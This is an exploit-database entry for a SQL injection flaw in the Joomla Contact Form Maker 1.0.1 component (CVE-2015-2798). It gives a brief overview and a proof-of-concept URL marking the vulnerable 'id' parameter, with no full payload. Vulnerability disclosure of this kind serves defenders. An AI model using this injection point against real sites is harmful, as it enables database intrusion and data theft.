Joomla! Component Contact Form Maker 1.0.1 - SQL Injection
| EKU-ID: 41104 | CVE: CVE-2015-2798;OSVDB-120067 | OSVDB-ID: |
| Author: TUNISIAN CYBER | Published: 2015-03-30 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 41104 | CVE: CVE-2015-2798;OSVDB-120067 | OSVDB-ID: |
| Author: TUNISIAN CYBER | Published: 2015-03-30 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability [+]Author: TUNISIAN CYBER [+]Date: 29/03/2015 [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker [+]Type:WebApp [+]Risk:High [+]Overview: Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL